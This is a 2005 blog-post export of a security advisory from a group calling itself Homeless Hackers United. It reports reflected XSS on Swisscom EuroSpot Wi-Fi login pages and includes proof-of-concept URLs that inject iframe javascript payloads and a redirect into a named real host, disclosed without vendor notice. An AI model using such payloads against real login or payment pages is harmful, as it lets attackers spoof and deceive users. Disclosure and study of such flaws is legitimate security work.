{"id":319,"date":"2005-10-28T22:55:50","date_gmt":"2005-10-28T15:55:50","guid":{"rendered":""},"modified":"2005-10-28T22:55:50","modified_gmt":"2005-10-28T15:55:50","slug":"hhu-1","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2005\/10\/hhu-1\/","title":{"rendered":"HHU #1"},"content":{"rendered":"

“It’s secure, it’s reliable, it’s Swiss”<\/p>\n

“It’s secure, it’s reliable, it’s Swiss”<\/p>\n

HHU
\n—
\nHomeless Hackers United is a small group of homeless hackers from Europe and
\nNorth America. We can’t afford paying for Internet access or hotel rooms.
\nOur only crime is to have a laptop and wireless card, and few knowledge.
\nHomeless state give us the freedom to access and use various open systems,
\naccessible from public places.<\/p>\n

Who
\n—
\nSwisscom EuroSpot is a wireless service offered in airports, hotels and
\nother public places. Customers buy certain amount of time online and get access
\nto the wireless network. The login page is of course open in order to join and
\nsubscribe to the service.
\nHHU has been able to access, and validate around several hotels and public
\nplaces.<\/p>\n

Severity
\n——–
\nMedium<\/p>\n

Vulnerability
\n————-
\nXSS, URL evasion<\/p>\n

Details
\n——-
\nSwisscom access point seems to use radius servers to provide internet access to
\ntheir customers. We also noticed issues on the radius authentification process
\nthat may be published later. After joining the network you will have either to
\nbuy access time or login. The following has been tested in UK, Germany, France
\nand Norway.<\/p>\n

[url=http:\/\/login**.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=XSS]http:\/\/login**.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=XSS[\/url]
\n[url=http:\/\/login**.swisscom-eurospot.com\/login.php?LANG=de&UserID=0&RadiusReply=XSS]http:\/\/login**.swisscom-eurospot.com\/login.php?LANG=de&UserID=0&RadiusReply=XSS[\/url]<\/p>\n

Proof of Concept
\n—————-
\n[url=http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=Please%20fix%20this%20site]http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=Please%20fix%20this%20site[\/url]
\n[url=http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C\/IFRAME%3E]http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C\/IFRAME%3E[\/url]
\n[url=http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http:\/\/google.com%2527)%3E%3C\/IFRAME%3E]http:\/\/login02.swisscom-eurospot.com\/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http:\/\/google.com%2527)%3E%3C\/IFRAME%3E[\/url]<\/p>\n

Impacts
\n——-
\nChange, spoof and fool end-users on login page or paiement page. With a bit on
\nimagination it can be worst.<\/p>\n

Timeline
\n——–
\nDiscovered: august 14th 2005
\nDisclosure: october 28th 2005
\nService Provider: no<\/p>\n

HHU Policy
\n———-
\nHHU can’t even afford food, and we’re are not paid to debug softwares or systems
\nfor free.
\nWe discover, then publish what we find. Will route tcp\/ip packets for food!
\n“Fool me once, shame on ? shame on you. Fool me ? you can’t get fooled again.”
\n? George W. Bush<\/p>\n

HHU Credits
\n———–
\ndeepquest for discovering and POC, Mescalito for more POC.
\noriginal post [url=http:\/\/deepquest.code511.com\/blog\/more.php?id=319_0_1_0_M]http:\/\/deepquest.code511.com\/blog\/more.php?id=319_0_1_0_M[\/url]<\/p>\n","protected":false},"excerpt":{"rendered":"

Swisscom EuroSpot is a wireless service vulnerability<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[9],"tags":[],"class_list":["post-319","post","type-post","status-publish","format-standard","hentry","category-hhu"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-59","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=319"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/319\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}